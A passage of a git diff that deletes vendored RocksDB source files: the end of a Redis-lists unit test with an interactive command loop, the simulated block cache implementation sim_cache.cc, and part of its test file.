-  ASSERT_TRUE(redis.Index("k1", 4, &tempv));
-  ASSERT_EQ(tempv, "z");
-  ASSERT_TRUE(redis.Index("k1", 5, &tempv));
-  ASSERT_EQ(tempv, "ba");
-  ASSERT_TRUE(redis.Index("k1", 6, &tempv));
-  ASSERT_EQ(tempv, "a");
-
-  // We currently have: [sad, nota, zz, happy, z, ba, a, aftera, x, newend]
-  // redis.Print("k1");   // manually check
-
-  // Test Inserting before/after non-existent values
-  lengthCheck = redis.Length("k1"); // Ensure that the length doesn't change
-  ASSERT_EQ(lengthCheck, 10);
-  ASSERT_EQ(redis.InsertBefore("k1", "non-exist", "randval"), lengthCheck);
-  ASSERT_EQ(redis.InsertAfter("k1", "nothing", "a"), lengthCheck);
-  ASSERT_EQ(redis.InsertAfter("randKey", "randVal", "ranValue"), 0); // Empty
-  ASSERT_EQ(redis.Length("k1"), lengthCheck); // The length should not change
-
-  // Simply Test the Set() function
-  redis.Set("k1", 5, "ba2");
-  redis.InsertBefore("k1", "ba2", "beforeba2");
-  ASSERT_TRUE(redis.Index("k1", 4, &tempv));
-  ASSERT_EQ(tempv, "z");
-  ASSERT_TRUE(redis.Index("k1", 5, &tempv));
-  ASSERT_EQ(tempv, "beforeba2");
-  ASSERT_TRUE(redis.Index("k1", 6, &tempv));
-  ASSERT_EQ(tempv, "ba2");
-  ASSERT_TRUE(redis.Index("k1", 7, &tempv));
-  ASSERT_EQ(tempv, "a");
-
-  // We have: [sad, nota, zz, happy, z, beforeba2, ba2, a, aftera, x, newend]
-
-  // Set() with negative indices
-  redis.Set("k1", -1, "endprank");
-  ASSERT_TRUE(!redis.Index("k1", 11, &tempv));
-  ASSERT_TRUE(redis.Index("k1", 10, &tempv));
-  ASSERT_EQ(tempv, "endprank"); // Ensure Set worked correctly
-  redis.Set("k1", -11, "t");
-  ASSERT_TRUE(redis.Index("k1", 0, &tempv));
-  ASSERT_EQ(tempv, "t");
-
-  // Test out of bounds Set
-  ASSERT_EQ(redis.Set("k1", -12, "ssd"), false);
-  ASSERT_EQ(redis.Set("k1", 11, "sasd"), false);
-  ASSERT_EQ(redis.Set("k1", 1200, "big"), false);
-}
-
-// Testing Trim, Pop
-TEST_F(RedisListsTest, TrimPopTest) {
-  RedisLists redis(kDefaultDbName, options, true);   // Destructive
-
-  std::string tempv;  // Used below for all Index(), PopRight(), PopLeft()
-
-  // A series of pushes and insertions
-  // Will result in [newbegin, z, a, aftera, x, newend]
-  redis.PushLeft("k1", "a");
-  redis.PushLeft("k1", "z");
-  redis.PushRight("k1", "x");
-  redis.InsertBefore("k1", "z", "newbegin");    // InsertBefore start of list
-  redis.InsertAfter("k1", "x", "newend");       // InsertAfter end of list
-  redis.InsertAfter("k1", "a", "aftera");
-
-  // Simple PopLeft/Right test
-  ASSERT_TRUE(redis.PopLeft("k1", &tempv));
-  ASSERT_EQ(tempv, "newbegin");
-  ASSERT_EQ(redis.Length("k1"), 5);
-  ASSERT_TRUE(redis.Index("k1", 0, &tempv));
-  ASSERT_EQ(tempv, "z");
-  ASSERT_TRUE(redis.PopRight("k1", &tempv));
-  ASSERT_EQ(tempv, "newend");
-  ASSERT_EQ(redis.Length("k1"), 4);
-  ASSERT_TRUE(redis.Index("k1", -1, &tempv));
-  ASSERT_EQ(tempv, "x");
-
-  // Now have: [z, a, aftera, x]
-
-  // Test Trim
-  ASSERT_TRUE(redis.Trim("k1", 0, -1));       // [z, a, aftera, x] (do nothing)
-  ASSERT_EQ(redis.Length("k1"), 4);
-  ASSERT_TRUE(redis.Trim("k1", 0, 2));                     // [z, a, aftera]
-  ASSERT_EQ(redis.Length("k1"), 3);
-  ASSERT_TRUE(redis.Index("k1", -1, &tempv));
-  ASSERT_EQ(tempv, "aftera");
-  ASSERT_TRUE(redis.Trim("k1", 1, 1));                     // [a]
-  ASSERT_EQ(redis.Length("k1"), 1);
-  ASSERT_TRUE(redis.Index("k1", 0, &tempv));
-  ASSERT_EQ(tempv, "a");
-
-  // Test out of bounds (empty) trim
-  ASSERT_TRUE(redis.Trim("k1", 1, 0));
-  ASSERT_EQ(redis.Length("k1"), 0);
-
-  // Popping with empty list (return empty without error)
-  ASSERT_TRUE(!redis.PopLeft("k1", &tempv));
-  ASSERT_TRUE(!redis.PopRight("k1", &tempv));
-  ASSERT_TRUE(redis.Trim("k1", 0, 5));
-
-  // Exhaustive Trim test (negative and invalid indices)
-  // Will start in [newbegin, z, a, aftera, x, newend]
-  redis.PushLeft("k1", "a");
-  redis.PushLeft("k1", "z");
-  redis.PushRight("k1", "x");
-  redis.InsertBefore("k1", "z", "newbegin");    // InsertBefore start of list
-  redis.InsertAfter("k1", "x", "newend");       // InsertAfter end of list
-  redis.InsertAfter("k1", "a", "aftera");
-  ASSERT_TRUE(redis.Trim("k1", -6, -1));                     // Should do nothing
-  ASSERT_EQ(redis.Length("k1"), 6);
-  ASSERT_TRUE(redis.Trim("k1", 1, -2));
-  ASSERT_TRUE(redis.Index("k1", 0, &tempv));
-  ASSERT_EQ(tempv, "z");
-  ASSERT_TRUE(redis.Index("k1", 3, &tempv));
-  ASSERT_EQ(tempv, "x");
-  ASSERT_EQ(redis.Length("k1"), 4);
-  ASSERT_TRUE(redis.Trim("k1", -3, -2));
-  ASSERT_EQ(redis.Length("k1"), 2);
-}
-
-// Testing Remove, RemoveFirst, RemoveLast
-TEST_F(RedisListsTest, RemoveTest) {
-  RedisLists redis(kDefaultDbName, options, true);   // Destructive
-
-  std::string tempv;  // Used below for all Index(), PopRight(), PopLeft()
-
-  // A series of pushes and insertions
-  // Will result in [newbegin, z, a, aftera, x, newend, a, a]
-  redis.PushLeft("k1", "a");
-  redis.PushLeft("k1", "z");
-  redis.PushRight("k1", "x");
-  redis.InsertBefore("k1", "z", "newbegin");    // InsertBefore start of list
-  redis.InsertAfter("k1", "x", "newend");       // InsertAfter end of list
-  redis.InsertAfter("k1", "a", "aftera");
-  redis.PushRight("k1", "a");
-  redis.PushRight("k1", "a");
-
-  // Verify
-  ASSERT_TRUE(redis.Index("k1", 0, &tempv));
-  ASSERT_EQ(tempv, "newbegin");
-  ASSERT_TRUE(redis.Index("k1", -1, &tempv));
-  ASSERT_EQ(tempv, "a");
-
-  // Check RemoveFirst (Remove the first two 'a')
-  // Results in [newbegin, z, aftera, x, newend, a]
-  int numRemoved = redis.Remove("k1", 2, "a");
-  ASSERT_EQ(numRemoved, 2);
-  ASSERT_TRUE(redis.Index("k1", 0, &tempv));
-  ASSERT_EQ(tempv, "newbegin");
-  ASSERT_TRUE(redis.Index("k1", 1, &tempv));
-  ASSERT_EQ(tempv, "z");
-  ASSERT_TRUE(redis.Index("k1", 4, &tempv));
-  ASSERT_EQ(tempv, "newend");
-  ASSERT_TRUE(redis.Index("k1", 5, &tempv));
-  ASSERT_EQ(tempv, "a");
-  ASSERT_EQ(redis.Length("k1"), 6);
-
-  // Repopulate some stuff
-  // Results in: [x, x, x, x, x, newbegin, z, x, aftera, x, newend, a, x]
-  redis.PushLeft("k1", "x");
-  redis.PushLeft("k1", "x");
-  redis.PushLeft("k1", "x");
-  redis.PushLeft("k1", "x");
-  redis.PushLeft("k1", "x");
-  redis.PushRight("k1", "x");
-  redis.InsertAfter("k1", "z", "x");
-
-  // Test removal from end
-  numRemoved = redis.Remove("k1", -2, "x");
-  ASSERT_EQ(numRemoved, 2);
-  ASSERT_TRUE(redis.Index("k1", 8, &tempv));
-  ASSERT_EQ(tempv, "aftera");
-  ASSERT_TRUE(redis.Index("k1", 9, &tempv));
-  ASSERT_EQ(tempv, "newend");
-  ASSERT_TRUE(redis.Index("k1", 10, &tempv));
-  ASSERT_EQ(tempv, "a");
-  ASSERT_TRUE(!redis.Index("k1", 11, &tempv));
-  numRemoved = redis.Remove("k1", -2, "x");
-  ASSERT_EQ(numRemoved, 2);
-  ASSERT_TRUE(redis.Index("k1", 4, &tempv));
-  ASSERT_EQ(tempv, "newbegin");
-  ASSERT_TRUE(redis.Index("k1", 6, &tempv));
-  ASSERT_EQ(tempv, "aftera");
-
-  // We now have: [x, x, x, x, newbegin, z, aftera, newend, a]
-  ASSERT_EQ(redis.Length("k1"), 9);
-  ASSERT_TRUE(redis.Index("k1", -1, &tempv));
-  ASSERT_EQ(tempv, "a");
-  ASSERT_TRUE(redis.Index("k1", 0, &tempv));
-  ASSERT_EQ(tempv, "x");
-
-  // Test over-shooting (removing more than there exists)
-  numRemoved = redis.Remove("k1", -9000, "x");
-  ASSERT_EQ(numRemoved , 4);    // Only really removed 4
-  ASSERT_EQ(redis.Length("k1"), 5);
-  ASSERT_TRUE(redis.Index("k1", 0, &tempv));
-  ASSERT_EQ(tempv, "newbegin");
-  numRemoved = redis.Remove("k1", 1, "x");
-  ASSERT_EQ(numRemoved, 0);
-
-  // Try removing ALL!
-  numRemoved = redis.Remove("k1", 0, "newbegin");   // REMOVE 0 will remove all!
-  ASSERT_EQ(numRemoved, 1);
-
-  // Removal from an empty-list
-  ASSERT_TRUE(redis.Trim("k1", 1, 0));
-  numRemoved = redis.Remove("k1", 1, "z");
-  ASSERT_EQ(numRemoved, 0);
-}
-
-
-// Test Multiple keys and Persistence
-TEST_F(RedisListsTest, PersistenceMultiKeyTest) {
-  std::string tempv;  // Used below for all Index(), PopRight(), PopLeft()
-
-  // Block one: populate a single key in the database
-  {
-    RedisLists redis(kDefaultDbName, options, true);   // Destructive
-
-    // A series of pushes and insertions
-    // Will result in [newbegin, z, a, aftera, x, newend, a, a]
-    redis.PushLeft("k1", "a");
-    redis.PushLeft("k1", "z");
-    redis.PushRight("k1", "x");
-    redis.InsertBefore("k1", "z", "newbegin");    // InsertBefore start of list
-    redis.InsertAfter("k1", "x", "newend");       // InsertAfter end of list
-    redis.InsertAfter("k1", "a", "aftera");
-    redis.PushRight("k1", "a");
-    redis.PushRight("k1", "a");
-
-    ASSERT_TRUE(redis.Index("k1", 3, &tempv));
-    ASSERT_EQ(tempv, "aftera");
-  }
-
-  // Block two: make sure changes were saved and add some other key
-  {
-    RedisLists redis(kDefaultDbName, options, false); // Persistent, non-destructive
-
-    // Check
-    ASSERT_EQ(redis.Length("k1"), 8);
-    ASSERT_TRUE(redis.Index("k1", 3, &tempv));
-    ASSERT_EQ(tempv, "aftera");
-
-    redis.PushRight("k2", "randomkey");
-    redis.PushLeft("k2", "sas");
-
-    redis.PopLeft("k1", &tempv);
-  }
-
-  // Block three: Verify the changes from block 2
-  {
-    RedisLists redis(kDefaultDbName, options, false); // Persistent, non-destructive
-
-    // Check
-    ASSERT_EQ(redis.Length("k1"), 7);
-    ASSERT_EQ(redis.Length("k2"), 2);
-    ASSERT_TRUE(redis.Index("k1", 0, &tempv));
-    ASSERT_EQ(tempv, "z");
-    ASSERT_TRUE(redis.Index("k2", -2, &tempv));
-    ASSERT_EQ(tempv, "sas");
-  }
-}
-
-/// THE manual REDIS TEST begins here
-/// THIS WILL ONLY OCCUR IF YOU RUN: ./redis_test -m
-
-namespace {
-void MakeUpper(std::string* const s) {
-  int len = static_cast<int>(s->length());
-  for (int i = 0; i < len; ++i) {
-    (*s)[i] = toupper((*s)[i]);  // C-version defined in <ctype.h>
-  }
-}
-
-/// Allows the user to enter in REDIS commands into the command-line.
-/// This is useful for manual / interacticve testing / debugging.
-///  Use destructive=true to clean the database before use.
-///  Use destructive=false to remember the previous state (i.e.: persistent)
-/// Should be called from main function.
-int manual_redis_test(bool destructive){
-  RedisLists redis(RedisListsTest::kDefaultDbName,
-                   RedisListsTest::options,
-                   destructive);
-
-  // TODO: Right now, please use spaces to separate each word.
-  //  In actual redis, you can use quotes to specify compound values
-  //  Example: RPUSH mylist "this is a compound value"
-
-  std::string command;
-  while(true) {
-    std::cin >> command;
-    MakeUpper(&command);
-
-    if (command == "LINSERT") {
-      std::string k, t, p, v;
-      std::cin >> k >> t >> p >> v;
-      MakeUpper(&t);
-      if (t=="BEFORE") {
-        std::cout << redis.InsertBefore(k, p, v) << std::endl;
-      } else if (t=="AFTER") {
-        std::cout << redis.InsertAfter(k, p, v) << std::endl;
-      }
-    } else if (command == "LPUSH") {
-      std::string k, v;
-      std::cin >> k >> v;
-      redis.PushLeft(k, v);
-    } else if (command == "RPUSH") {
-      std::string k, v;
-      std::cin >> k >> v;
-      redis.PushRight(k, v);
-    } else if (command == "LPOP") {
-      std::string k;
-      std::cin >> k;
-      std::string res;
-      redis.PopLeft(k, &res);
-      std::cout << res << std::endl;
-    } else if (command == "RPOP") {
-      std::string k;
-      std::cin >> k;
-      std::string res;
-      redis.PopRight(k, &res);
-      std::cout << res << std::endl;
-    } else if (command == "LREM") {
-      std::string k;
-      int amt;
-      std::string v;
-
-      std::cin >> k >> amt >> v;
-      std::cout << redis.Remove(k, amt, v) << std::endl;
-    } else if (command == "LLEN") {
-      std::string k;
-      std::cin >> k;
-      std::cout << redis.Length(k) << std::endl;
-    } else if (command == "LRANGE") {
-      std::string k;
-      int i, j;
-      std::cin >> k >> i >> j;
-      std::vector<std::string> res = redis.Range(k, i, j);
-      for (auto it = res.begin(); it != res.end(); ++it) {
-        std::cout << " " << (*it);
-      }
-      std::cout << std::endl;
-    } else if (command == "LTRIM") {
-      std::string k;
-      int i, j;
-      std::cin >> k >> i >> j;
-      redis.Trim(k, i, j);
-    } else if (command == "LSET") {
-      std::string k;
-      int idx;
-      std::string v;
-      std::cin >> k >> idx >> v;
-      redis.Set(k, idx, v);
-    } else if (command == "LINDEX") {
-      std::string k;
-      int idx;
-      std::cin >> k >> idx;
-      std::string res;
-      redis.Index(k, idx, &res);
-      std::cout << res << std::endl;
-    } else if (command == "PRINT") {      // Added by Deon
-      std::string k;
-      std::cin >> k;
-      redis.Print(k);
-    } else if (command == "QUIT") {
-      return 0;
-    } else {
-      std::cout << "unknown command: " << command << std::endl;
-    }
-  }
-}
-}  // namespace
-
-} // namespace rocksdb
-
-
-// USAGE: "./redis_test" for default (unit tests)
-//        "./redis_test -m" for manual testing (redis command api)
-//        "./redis_test -m -d" for destructive manual test (erase db before use)
-
-
-namespace {
-// Check for "want" argument in the argument list
-bool found_arg(int argc, char* argv[], const char* want){
-  for(int i=1; i<argc; ++i){
-    if (strcmp(argv[i], want) == 0) {
-      return true;
-    }
-  }
-  return false;
-}
-}  // namespace
-
-// Will run unit tests.
-// However, if -m is specified, it will do user manual/interactive testing
-// -m -d is manual and destructive (will clear the database before use)
-int main(int argc, char* argv[]) {
-  ::testing::InitGoogleTest(&argc, argv);
-  if (found_arg(argc, argv, "-m")) {
-    bool destructive = found_arg(argc, argv, "-d");
-    return rocksdb::manual_redis_test(destructive);
-  } else {
-    return RUN_ALL_TESTS();
-  }
-}
-
-#else
-#include <stdio.h>
-
-int main(int argc, char* argv[]) {
-  fprintf(stderr, "SKIPPED as redis is not supported in ROCKSDB_LITE\n");
-  return 0;
-}
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/simulator_cache/sim_cache.cc b/thirdparty/rocksdb/utilities/simulator_cache/sim_cache.cc
deleted file mode 100644
index e3d8016..0000000
--- a/thirdparty/rocksdb/utilities/simulator_cache/sim_cache.cc
+++ /dev/null
@@ -1,341 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "rocksdb/utilities/sim_cache.h"
-#include <atomic>
-#include "monitoring/statistics.h"
-#include "port/port.h"
-#include "rocksdb/env.h"
-#include "util/file_reader_writer.h"
-#include "util/mutexlock.h"
-#include "util/string_util.h"
-
-namespace rocksdb {
-
-namespace {
-
-class CacheActivityLogger {
- public:
-  CacheActivityLogger()
-      : activity_logging_enabled_(false), max_logging_size_(0) {}
-
-  ~CacheActivityLogger() {
-    MutexLock l(&mutex_);
-
-    StopLoggingInternal();
-  }
-
-  Status StartLogging(const std::string& activity_log_file, Env* env,
-                      uint64_t max_logging_size = 0) {
-    assert(activity_log_file != "");
-    assert(env != nullptr);
-
-    Status status;
-    EnvOptions env_opts;
-    std::unique_ptr<WritableFile> log_file;
-
-    MutexLock l(&mutex_);
-
-    // Stop existing logging if any
-    StopLoggingInternal();
-
-    // Open log file
-    status = env->NewWritableFile(activity_log_file, &log_file, env_opts);
-    if (!status.ok()) {
-      return status;
-    }
-    file_writer_.reset(new WritableFileWriter(std::move(log_file), env_opts));
-
-    max_logging_size_ = max_logging_size;
-    activity_logging_enabled_.store(true);
-
-    return status;
-  }
-
-  void StopLogging() {
-    MutexLock l(&mutex_);
-
-    StopLoggingInternal();
-  }
-
-  void ReportLookup(const Slice& key) {
-    if (activity_logging_enabled_.load() == false) {
-      return;
-    }
-
-    std::string log_line = "LOOKUP - " + key.ToString(true) + "\n";
-
-    // line format: "LOOKUP - <KEY>"
-    MutexLock l(&mutex_);
-    Status s = file_writer_->Append(log_line);
-    if (!s.ok() && bg_status_.ok()) {
-      bg_status_ = s;
-    }
-    if (MaxLoggingSizeReached() || !bg_status_.ok()) {
-      // Stop logging if we have reached the max file size or
-      // encountered an error
-      StopLoggingInternal();
-    }
-  }
-
-  void ReportAdd(const Slice& key, size_t size) {
-    if (activity_logging_enabled_.load() == false) {
-      return;
-    }
-
-    std::string log_line = "ADD - ";
-    log_line += key.ToString(true);
-    log_line += " - ";
-    AppendNumberTo(&log_line, size);
-		log_line += "\n";
-
-    // line format: "ADD - <KEY> - <KEY-SIZE>"
-    MutexLock l(&mutex_);
-    Status s = file_writer_->Append(log_line);
-    if (!s.ok() && bg_status_.ok()) {
-      bg_status_ = s;
-    }
-
-    if (MaxLoggingSizeReached() || !bg_status_.ok()) {
-      // Stop logging if we have reached the max file size or
-      // encountered an error
-      StopLoggingInternal();
-    }
-  }
-
-  Status& bg_status() {
-    MutexLock l(&mutex_);
-    return bg_status_;
-  }
-
- private:
-  bool MaxLoggingSizeReached() {
-    mutex_.AssertHeld();
-
-    return (max_logging_size_ > 0 &&
-            file_writer_->GetFileSize() >= max_logging_size_);
-  }
-
-  void StopLoggingInternal() {
-    mutex_.AssertHeld();
-
-    if (!activity_logging_enabled_) {
-      return;
-    }
-
-    activity_logging_enabled_.store(false);
-    Status s = file_writer_->Close();
-    if (!s.ok() && bg_status_.ok()) {
-      bg_status_ = s;
-    }
-  }
-
-  // Mutex to sync writes to file_writer, and all following
-  // class data members
-  port::Mutex mutex_;
-  // Indicates if logging is currently enabled
-  // atomic to allow reads without mutex
-  std::atomic<bool> activity_logging_enabled_;
-  // When reached, we will stop logging and close the file
-  // Value of 0 means unlimited
-  uint64_t max_logging_size_;
-  std::unique_ptr<WritableFileWriter> file_writer_;
-  Status bg_status_;
-};
-
-// SimCacheImpl definition
-class SimCacheImpl : public SimCache {
- public:
-  // capacity for real cache (ShardedLRUCache)
-  // test_capacity for key only cache
-  SimCacheImpl(std::shared_ptr<Cache> cache, size_t sim_capacity,
-               int num_shard_bits)
-      : cache_(cache),
-        key_only_cache_(NewLRUCache(sim_capacity, num_shard_bits)),
-        miss_times_(0),
-        hit_times_(0) {}
-
-  virtual ~SimCacheImpl() {}
-  virtual void SetCapacity(size_t capacity) override {
-    cache_->SetCapacity(capacity);
-  }
-
-  virtual void SetStrictCapacityLimit(bool strict_capacity_limit) override {
-    cache_->SetStrictCapacityLimit(strict_capacity_limit);
-  }
-
-  virtual Status Insert(const Slice& key, void* value, size_t charge,
-                        void (*deleter)(const Slice& key, void* value),
-                        Handle** handle, Priority priority) override {
-    // The handle and value passed in are for real cache, so we pass nullptr
-    // to key_only_cache_ for both instead. Also, the deleter function pointer
-    // will be called by user to perform some external operation which should
-    // be applied only once. Thus key_only_cache accepts an empty function.
-    // *Lambda function without capture can be assgined to a function pointer
-    Handle* h = key_only_cache_->Lookup(key);
-    if (h == nullptr) {
-      key_only_cache_->Insert(key, nullptr, charge,
-                              [](const Slice& k, void* v) {}, nullptr,
-                              priority);
-    } else {
-      key_only_cache_->Release(h);
-    }
-
-    cache_activity_logger_.ReportAdd(key, charge);
-
-    return cache_->Insert(key, value, charge, deleter, handle, priority);
-  }
-
-  virtual Handle* Lookup(const Slice& key, Statistics* stats) override {
-    Handle* h = key_only_cache_->Lookup(key);
-    if (h != nullptr) {
-      key_only_cache_->Release(h);
-      inc_hit_counter();
-      RecordTick(stats, SIM_BLOCK_CACHE_HIT);
-    } else {
-      inc_miss_counter();
-      RecordTick(stats, SIM_BLOCK_CACHE_MISS);
-    }
-
-    cache_activity_logger_.ReportLookup(key);
-
-    return cache_->Lookup(key, stats);
-  }
-
-  virtual bool Ref(Handle* handle) override { return cache_->Ref(handle); }
-
-  virtual bool Release(Handle* handle, bool force_erase = false) override {
-    return cache_->Release(handle, force_erase);
-  }
-
-  virtual void Erase(const Slice& key) override {
-    cache_->Erase(key);
-    key_only_cache_->Erase(key);
-  }
-
-  virtual void* Value(Handle* handle) override { return cache_->Value(handle); }
-
-  virtual uint64_t NewId() override { return cache_->NewId(); }
-
-  virtual size_t GetCapacity() const override { return cache_->GetCapacity(); }
-
-  virtual bool HasStrictCapacityLimit() const override {
-    return cache_->HasStrictCapacityLimit();
-  }
-
-  virtual size_t GetUsage() const override { return cache_->GetUsage(); }
-
-  virtual size_t GetUsage(Handle* handle) const override {
-    return cache_->GetUsage(handle);
-  }
-
-  virtual size_t GetPinnedUsage() const override {
-    return cache_->GetPinnedUsage();
-  }
-
-  virtual void DisownData() override {
-    cache_->DisownData();
-    key_only_cache_->DisownData();
-  }
-
-  virtual void ApplyToAllCacheEntries(void (*callback)(void*, size_t),
-                                      bool thread_safe) override {
-    // only apply to _cache since key_only_cache doesn't hold value
-    cache_->ApplyToAllCacheEntries(callback, thread_safe);
-  }
-
-  virtual void EraseUnRefEntries() override {
-    cache_->EraseUnRefEntries();
-    key_only_cache_->EraseUnRefEntries();
-  }
-
-  virtual size_t GetSimCapacity() const override {
-    return key_only_cache_->GetCapacity();
-  }
-  virtual size_t GetSimUsage() const override {
-    return key_only_cache_->GetUsage();
-  }
-  virtual void SetSimCapacity(size_t capacity) override {
-    key_only_cache_->SetCapacity(capacity);
-  }
-
-  virtual uint64_t get_miss_counter() const override {
-    return miss_times_.load(std::memory_order_relaxed);
-  }
-
-  virtual uint64_t get_hit_counter() const override {
-    return hit_times_.load(std::memory_order_relaxed);
-  }
-
-  virtual void reset_counter() override {
-    miss_times_.store(0, std::memory_order_relaxed);
-    hit_times_.store(0, std::memory_order_relaxed);
-    SetTickerCount(stats_, SIM_BLOCK_CACHE_HIT, 0);
-    SetTickerCount(stats_, SIM_BLOCK_CACHE_MISS, 0);
-  }
-
-  virtual std::string ToString() const override {
-    std::string res;
-    res.append("SimCache MISSes: " + std::to_string(get_miss_counter()) + "\n");
-    res.append("SimCache HITs:    " + std::to_string(get_hit_counter()) + "\n");
-    char buff[350];
-    auto lookups = get_miss_counter() + get_hit_counter();
-    snprintf(buff, sizeof(buff), "SimCache HITRATE: %.2f%%\n",
-             (lookups == 0 ? 0 : get_hit_counter() * 100.0f / lookups));
-    res.append(buff);
-    return res;
-  }
-
-  virtual std::string GetPrintableOptions() const override {
-    std::string ret;
-    ret.reserve(20000);
-    ret.append("    cache_options:\n");
-    ret.append(cache_->GetPrintableOptions());
-    ret.append("    sim_cache_options:\n");
-    ret.append(key_only_cache_->GetPrintableOptions());
-    return ret;
-  }
-
-  virtual Status StartActivityLogging(const std::string& activity_log_file,
-                                      Env* env,
-                                      uint64_t max_logging_size = 0) override {
-    return cache_activity_logger_.StartLogging(activity_log_file, env,
-                                               max_logging_size);
-  }
-
-  virtual void StopActivityLogging() override {
-    cache_activity_logger_.StopLogging();
-  }
-
-  virtual Status GetActivityLoggingStatus() override {
-    return cache_activity_logger_.bg_status();
-  }
-
- private:
-  std::shared_ptr<Cache> cache_;
-  std::shared_ptr<Cache> key_only_cache_;
-  std::atomic<uint64_t> miss_times_;
-  std::atomic<uint64_t> hit_times_;
-  Statistics* stats_;
-  CacheActivityLogger cache_activity_logger_;
-
-  void inc_miss_counter() {
-    miss_times_.fetch_add(1, std::memory_order_relaxed);
-  }
-  void inc_hit_counter() { hit_times_.fetch_add(1, std::memory_order_relaxed); }
-};
-
-}  // end anonymous namespace
-
-// For instrumentation purpose, use NewSimCache instead
-std::shared_ptr<SimCache> NewSimCache(std::shared_ptr<Cache> cache,
-                                      size_t sim_capacity, int num_shard_bits) {
-  if (num_shard_bits >= 20) {
-    return nullptr;  // the cache cannot be sharded into too many fine pieces
-  }
-  return std::make_shared<SimCacheImpl>(cache, sim_capacity, num_shard_bits);
-}
-
-}  // end namespace rocksdb
diff --git a/thirdparty/rocksdb/utilities/simulator_cache/sim_cache_test.cc b/thirdparty/rocksdb/utilities/simulator_cache/sim_cache_test.cc
deleted file mode 100644
index 4c175c9..0000000
--- a/thirdparty/rocksdb/utilities/simulator_cache/sim_cache_test.cc
+++ /dev/null
@@ -1,218 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "rocksdb/utilities/sim_cache.h"
-#include <cstdlib>
-#include "db/db_test_util.h"
-#include "port/stack_trace.h"
-
-namespace rocksdb {
-
-class SimCacheTest : public DBTestBase {
- private:
-  size_t miss_count_ = 0;
-  size_t hit_count_ = 0;
-  size_t insert_count_ = 0;
-  size_t failure_count_ = 0;
-
- public:
-  const size_t kNumBlocks = 5;
-  const size_t kValueSize = 1000;
-
-  SimCacheTest() : DBTestBase("/sim_cache_test") {}
-
-  BlockBasedTableOptions GetTableOptions() {
-    BlockBasedTableOptions table_options;
-    // Set a small enough block size so that each key-value get its own block.
-    table_options.block_size = 1;
-    return table_options;
-  }
-
-  Options GetOptions(const BlockBasedTableOptions& table_options) {
-    Options options = CurrentOptions();
-    options.create_if_missing = true;
-    // options.compression = kNoCompression;
-    options.statistics = rocksdb::CreateDBStatistics();
-    options.table_factory.reset(new BlockBasedTableFactory(table_options));
-    return options;
-  }
-
-  void InitTable(const Options& options) {
-    std::string value(kValueSize, 'a');
-    for (size_t i = 0; i < kNumBlocks * 2; i++) {
-      ASSERT_OK(Put(ToString(i), value.c_str()));
-    }
-  }
-
-  void RecordCacheCounters(const Options& options) {
-    miss_count_ = TestGetTickerCount(options, BLOCK_CACHE_MISS);
-    hit_count_ = TestGetTickerCount(options, BLOCK_CACHE_HIT);
-    insert_count_ = TestGetTickerCount(options, BLOCK_CACHE_ADD);
-    failure_count_ = TestGetTickerCount(options, BLOCK_CACHE_ADD_FAILURES);
-  }
-
-  void CheckCacheCounters(const Options& options, size_t expected_misses,
-                          size_t expected_hits, size_t expected_inserts,
-                          size_t expected_failures) {
-    size_t new_miss_count = TestGetTickerCount(options, BLOCK_CACHE_MISS);
-    size_t new_hit_count = TestGetTickerCount(options, BLOCK_CACHE_HIT);
-    size_t new_insert_count = TestGetTickerCount(options, BLOCK_CACHE_ADD);
-    size_t new_failure_count =
-        TestGetTickerCount(options, BLOCK_CACHE_ADD_FAILURES);
-    ASSERT_EQ(miss_count_ + expected_misses, new_miss_count);
-    ASSERT_EQ(hit_count_ + expected_hits, new_hit_count);
-    ASSERT_EQ(insert_count_ + expected_inserts, new_insert_count);
-    ASSERT_EQ(failure_count_ + expected_failures, new_failure_count);
-    miss_count_ = new_miss_count;
-    hit_count_ = new_hit_count;
-    insert_count_ = new_insert_count;
-    failure_count_ = new_failure_count;
-  }
-};
-
-TEST_F(SimCacheTest, SimCache) {
-  ReadOptions read_options;
-  auto table_options = GetTableOptions();
-  auto options = GetOptions(table_options);
-  InitTable(options);
-  std::shared_ptr<SimCache> simCache =
-      NewSimCache(NewLRUCache(0, 0, false), 20000, 0);
-  table_options.block_cache = simCache;
-  options.table_factory.reset(new BlockBasedTableFactory(table_options));
-  Reopen(options);
-  RecordCacheCounters(options);
-
-  std::vector<std::unique_ptr<Iterator>> iterators(kNumBlocks);
-  Iterator* iter = nullptr;
-
-  // Load blocks into cache.
-  for (size_t i = 0; i < kNumBlocks; i++) {
-    iter = db_->NewIterator(read_options);
-    iter->Seek(ToString(i));
-    ASSERT_OK(iter->status());
-    CheckCacheCounters(options, 1, 0, 1, 0);
-    iterators[i].reset(iter);
-  }
-  ASSERT_EQ(kNumBlocks,
-            simCache->get_hit_counter() + simCache->get_miss_counter());
-  ASSERT_EQ(0, simCache->get_hit_counter());
-  size_t usage = simCache->GetUsage();
-  ASSERT_LT(0, usage);
-  ASSERT_EQ(usage, simCache->GetSimUsage());
-  simCache->SetCapacity(usage);
-  ASSERT_EQ(usage, simCache->GetPinnedUsage());
-
-  // Test with strict capacity limit.
-  simCache->SetStrictCapacityLimit(true);
-  iter = db_->NewIterator(read_options);
-  iter->Seek(ToString(kNumBlocks * 2 - 1));
-  ASSERT_TRUE(iter->status().IsIncomplete());
-  CheckCacheCounters(options, 1, 0, 0, 1);
-  delete iter;
-  iter = nullptr;
-
-  // Release iterators and access cache again.
-  for (size_t i = 0; i < kNumBlocks; i++) {
-    iterators[i].reset();
-    CheckCacheCounters(options, 0, 0, 0, 0);
-  }
-  // Add kNumBlocks again
-  for (size_t i = 0; i < kNumBlocks; i++) {
-    std::unique_ptr<Iterator> it(db_->NewIterator(read_options));
-    it->Seek(ToString(i));
-    ASSERT_OK(it->status());
-    CheckCacheCounters(options, 0, 1, 0, 0);
-  }
-  ASSERT_EQ(5, simCache->get_hit_counter());
-  for (size_t i = kNumBlocks; i < kNumBlocks * 2; i++) {
-    std::unique_ptr<Iterator> it(db_->NewIterator(read_options));
-    it->Seek(ToString(i));
-    ASSERT_OK(it->status());
-    CheckCacheCounters(options, 1, 0, 1, 0);
-  }
